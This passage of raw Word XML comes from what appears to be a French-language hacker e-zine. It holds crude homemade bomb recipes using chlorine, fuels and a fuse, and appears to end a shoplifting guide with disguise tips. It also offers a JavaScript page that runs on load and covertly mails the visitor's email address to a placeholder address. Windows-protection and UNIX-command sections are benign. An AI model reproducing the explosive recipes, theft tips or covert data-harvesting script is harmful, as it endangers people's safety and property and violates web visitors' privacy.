          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Ensuite, tu sors de la tabagie en lui disant aurevoir et lui disant que tu vas aller voir dans d'autres Tabagie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Vêtements: il faut que tu t'habilles en une personne normal come si tu irais a l'école et avec un sac à dos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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______________________________</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3.5 Anarchy: Création d'une bombe #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lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>materiel: lait, chlore, un pot de plastique...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Prend du lait verse le dans le pot...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Prend le chlore et verse le dans le pot...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Ferme le et brassse le...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Met le très loin de la maison pour pas que ta maison explose..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Va jamais voir le contenant...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Avertissement:il pourrait t'exploser dans la figure n'importe quand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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auto" w:line="24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auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>2ieme bombe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Materiel:chlore,alcool,gaz,huile,propane,allumette ou lighter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Prend toi un pot..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Met tout ces ingrédients....</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Fait un trou dans le couvercle..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Pas trop gros.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Met la ficelle et fait un bout qui dépasse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Ferme le couvercle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Allume la mèche et lance cette bombe le plus loin possible!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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________________________________</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3.6 Protection de windows, par Dukest4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ans cette article, je ne vais pas donné de gros truc pour proteg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tre cpu mais plutot dire ce que je pense de la protection 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ndows et ce donc vous devriez tous faire pour proteger votre ord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place d'utilisé des programmes comme NukeNabber etc et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er lamer un peu comme article mais c'est pratique pareille p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ersonne comprend ca... tlm utilise des criss de proteciton qu'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e sert qu'a une chose: rendre le hacking 2 fois plus faci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k j'va vous expliquer ce que moi je fait pour me proteg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j'ai toute enlever mes protections du style a Nuke Nabb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ockdown2000, conseal pc firewall ou wathever c koi la prote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utili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je me port scan et je regarde toute les ports d'ouvert sur m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rdi... une fois que c'est faite je m'arrange pour fermer chaq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rts au complet... comme par exemple, si le port 139 etais ouve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e me patcherai contre le oob... ou wathever qu'elle port est ouve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tcher le contre son bug ou bien si s'est un port d'ICQ la tu pe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tiliser une protection du genre a wfips2 ou wathever... malgré q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eme ca cer con... de cette maniere a peu pret la seul chose que qq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eut vous faire sa va etre de vous flooder... ou smurfer si vo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eferer ou d'utiliser des exploits de linux sur vous... tu devr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tcher ton modem contre ceux ci... comme utiliser un antiicmp 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tiflood, et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is meme la... sans ports d'ouvert ton ordi est deja beaucoup pl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curitaire qu'avec s'tes stupide protections la qui ouvre des por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ur les bloqu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k tu peut utiliser un antivirus quand meme :) je dit pas d'enle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 :) Mon préféré et celui que je crois le meilleur c'est AV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tiviral toolkit pro) tu peut le prendre de avp.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t a propos de fermer tes ports bin si tu veut savoir a peu pr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aque ports ce qu'ils sont, sa peut etre pratique pour trou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mment le fermer, downlo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ttp://www.altern.org/qha/port-numbers.zi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onne ch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ukest4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_____________________________________________</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3.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Récupérer un e-mail avec le JavaScript, par Clad Strife</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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e JavaScript n'est pas si innofensif qu'on pourrait le croire... En fait on va éclaircir cette affaire qui à l'air de nous intéresser. En réalité le JavaScript n'est pas dangereux, c'est un fait. cependant il peut nous permettre d'obtenir certaines informations. Attendez là. Vous allez dire: "alors quand on va sur un site warez et qu'on nous donne notre adresse IP, notre version de Navigateur etc..., l'administrateur du site le sait?". Non il ne le sait pas. Le JavaScript qui fait ça ne fait que récupérer les informations que vous aurez bien voulu mettre ou les Informations par defaut. Mais... Mais certains scripts JavaScripts font une requête via une dialogbox au visiteur du site, et comme en général les visiteurs cliquent comme des malades sur OK en voyant une dialogbox, vous devrez pas avoir trop de problèmes à choper ces infos (mails dont on va parler). Bon voilà le script qu'y vous est fourni avec QHA03 pour faire vos bidouilles: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t;HTML&gt;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t;HEAD&gt;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t;SCRIPT LANGUAGE=JavaScript&gt;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t;!--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function chouraveMail ()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maintenant = new Date();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message = maintenant.getDate()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eval(maintenant.getMonth()+1)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maintenant.getYear();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ocument.formulaireBidon.champMasque.value = message;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ocument.formulaireBidon.submit();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gt;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t;/SCRIPT&gt;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t;/HEAD&gt;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t;BODY onLoad = 'chouraveMail();'&gt;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Merci pour les renseignements :-)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t;FORM NAME=formulaireBidon METHOD=POST ACTION="mailto:adressebidon@tonserveur.com"&gt;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t;INPUT TYPE=HIDDEN NAME=champMasque&gt;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t;/FORM&gt;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t;/BODY&gt;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t;/HTML&gt;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insi, ce ch'tit code va créer un mail avec l'adresse e-mail par default mise dans le Browser utilisé pour visiter la page web! </w:t>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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Pourquoi faire compliqué quand on peut faire simple? </w:t>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___________________</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3.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>UNIX, par Clad Strif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commande : commande seule Exemple : ls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commande [-options] : commande avec des options Exemple : ls -al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commande arguments : commande avec des arguments Exemple : ls *.lst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commande [-options ] arguments : commande avec des options et des arguments Exemple : ls -al *.lst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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment changer son mot de passe ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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passwd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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Qui est connecté ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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who :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f :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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Qui suis-je ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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whoami me dit qui je suis.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who am i me dit qui je suis en plus complet.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logname donne mon nom d'utilisateur (login).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Généralités sur les fichiers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Un fichier ordinaire est un fichier contenant des donneés de tout type (programmes, scripts, textes, donneés ...)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Un fichier spécial est un fichier désignant un périphérique (disque, disquette, imprimante, streamer, console ..). La philosophie UNIX implique que tout est un fichier. Cela signifie que pour UNIX, écrire sur un périphérique revient à écrire sur un fichier.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Les noms de fichiers :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Le nom des fichiers peut etre constitué de lettres majuscules et minuscules, de chiffres et de certains caractères ascii.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Les fichiers silencieux commencent par un ".". Ils sont utilisés pour configurer l'environnement.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Métacaractères :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 : remplace une chaine de caractères.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 : remplace un caractèr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 : remplace tout caractère précise entre les crochets. Pas de séparateur.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 : précise un intervall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Exemples :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ls *.old : liste tous les fichiers du répertoire courant se terminant par .old.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ls kk* : liste tous les fichiers commançant par la lettre kk.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ls ?89 : liste tous les fichiers commançant par n'importe quelle lettre suivi de 89. lettre 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ls [ae]* : liste tous les fichiers commançant par la lettre a ou la lettre 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ls [a-e]* : liste tous les fichiers commançant par les lettres a,b,c,d ou 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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment afficher le contenu d'un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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cat nom_du_fichier : affiche le contenu du fichier "nom_du_fichier" à l'écran.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more nom_du_fichier : affiche le contenu du fichier "nom_du_fichier" page par pag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barre d 'espace : pour afficher la page suivant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h : help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 : numéro de la lign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v : appel de l'éditeur vi.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b : pour afficher la page précédente (back)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nombre]d: avance de nombre de lignes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nombre]s : saut de nombre de lignes et affichage d'une pag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nombre]f : nombre de pages et affichage d'une pag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commande shell : exécution de la commande shell donné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pg nom_du_fichier : affiche le contenu du fichier "nom_du_fichier" page par pag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nombre : nombre définit la taille de la fenêtre (par défaut 23 lignes sur un écran texte de 24 lignes).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p chaine :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n :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s :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nombre : l'affichage commence à la ligne de numéro donné.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expr_régulière/ : l'affichage commence à la première ligne contenant un motif satisfaisant l'expression régulière donné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od nom_du_fichier : affiche tous les caractères du fichier "nom_du_fichier"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od -c : caractèr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od -d : décimal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od -o : octa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od -h : hexadécimal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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment copier un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : cp [-hip] fichier1 fichier2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h : pour avoir la syntaxe (help)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i : demande de confirmer (interactiv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p : le fichier est copié avec les mêmes droits d'accés et la même date de dernière mise à jour.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment déplacer un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : mv [-if] fichier1 fichier2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i : demande de confirmer si le fichier "fichier2" existe déjà.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f : écrase le fichier "fichier2" s'il existe déjà.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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment détruire un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : rm [-i] [-f] nom_du_fichier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rm -i nom_du_fichier : avec demande de confirmation.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rm -f nom_du_fichier : force la destruction.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ttention : la destruction est irrémédiable. Il n'existe pas de commande "undelete" comme sous MS-DOS. Vous pouvez tout de même récupérer la dernière sauvegarde de ce fichier si elle a été fait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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment créér un fichier vide ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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touch nom_du_fichier :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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment concaténer 2 fichiers ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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cat fichier1 fichier2 : concatène le fichier "fichier1" puis le fichier "fichier2" et affiche le résultat sur la sortie standard qui est l'écran.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cat fichier1 fichier2 &gt; fichier3 : concatène le fichier "fichier1" puis le fichier "fichier2" et affiche le résultat dans le fichier "fichier3".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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment avoir des informations sur un fichier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?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wc -c nom_du_fichier : donne le nombre de caractères (octets) du fichier "nom_du_fichier".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wc -l nom_du_fichier : donne le nombre de lignes (lines) du fichier "nom_du_fichier".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wc -w nom_du_fichier : donne le nombre de mots (words) du fichier "nom_du_fichier".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wc nom_du_fichier : donne le nombre de caractères, de lignes, de mots du fichier "nom_du_fichier".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De quel type est ce fichier ?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file nom_du_fichier : donne le type du fichier "nom_du_fichier".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Exemples :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file unix.sgml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unix.sgml : ascii text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file unix.sp unix.ps : PostScript document conforming at level 2.0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file docunix docunix : directory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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment extraire des portions de lignes d'un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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cut -c1-7,20- nom_du_fichier : permet d'extraire dans chaque ligne du fichier nom_du_fichier les 7 premiers caractères et tous les caractères à partir du vingtième. Attention, le résultat s'affiche sur la sortie standard, c'est à dire l'écran).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cut -c1-7,20- nom_du_fichier &gt; nouveau_fichier : même opération mais le résultat est stocké dans le fichier "nouveau_fichier".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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment trier un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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Syntaxe : sort [-options] [+pos1] [-pos2] fichier_entree [-o fichier_sorti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Exemple :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cat fichier1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Jacques titi Ginett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lbert toto Marc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Franck tonton Ann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Edouard tata Alfons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Franck tonton Ann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sort -u fichier1 : permet de trier et de n'afficher que les lignes non identiques (option -u).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lbert toto Marc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Edouard tata Alfons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Franck tonton Ann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Jacques titi Ginett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sort +2 fichier1 : permet de trier sur le troisième champ.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Edouard tata Alfons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Franck tonton Ann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Franck tonton Ann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Jacques titi Ginett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lbert toto Marc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Comment juxtaposer deux ou plusieurs fichiers ?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Syntaxe : paste [-d suite_caracteres] nom_fichier1 nom_fichier2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Exemple :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cat nom_fichier1 :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55555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4444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333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22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1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cat nom_fichier2 :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bb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ccc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dddd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eeee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paste -d "+" nom_fichier1 nom_fichier2 :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55555+a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4444+bb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333+ccc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22+dddd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1+eeee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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment comparer deux fichiers entre eux ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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cmp nom_fichier1 nom_fichier2 : compare le fichier "nom_fichier1" et le fichier "nom_fichier2" et indique s'ils sont différents.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diff nom_fichier1 nom_fichier2 : affiche les lignes différentes du fichier "nom_fichier1" et du fichier "nom_fichier2"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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment rechercher une chaîne de caractères dans un fichier ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserv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grep fournet /etc/aliases : permet de rechercher toutes les lignes contenant la chaîne de caractères "fournet" dans le fichier "/etc/aliases"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fournet: fournet@toulouse.inra.fr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flo:fournet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grep MAXNQ *.f : pour rechercher la chaîne "MAXNQ" dans tous les fichiers suffixés ".f", c'est à dire tous les fichiers sources Fortran du répertoire courant.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dfls3q.f: PARAMETER( MAXQ2=MAXNQ+MAXNQ,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dfmmd3.f: PARAMETER( MAXQ2=MAXNQ+MAXNQ,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dfmmd3.f:46 CALL DFCOM(NPARM,0,NCALL,MAXNQ,NQ2,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dfmmp3.f: PARAMETER( MAXQ2=MAXNQ+MAXNQ,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dfmmp3.f: CALL DFPDIA (NEL,II,JJ0,NQ2,MAXNQ2,AA,SIGMA)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dfmmp3.f: CALL DFPBLK (NEL,II,JJ0,NQ2,MAXNQ2,AA,SIGMA)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Généralités sur les répertoires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Un répertoire est un fichier contenant un liste de noms de fichiers et de noms de sous-répertoires.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Un répertoire père : est un répertoire de niveau immédiatement supérieur au répertoire courant.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Un 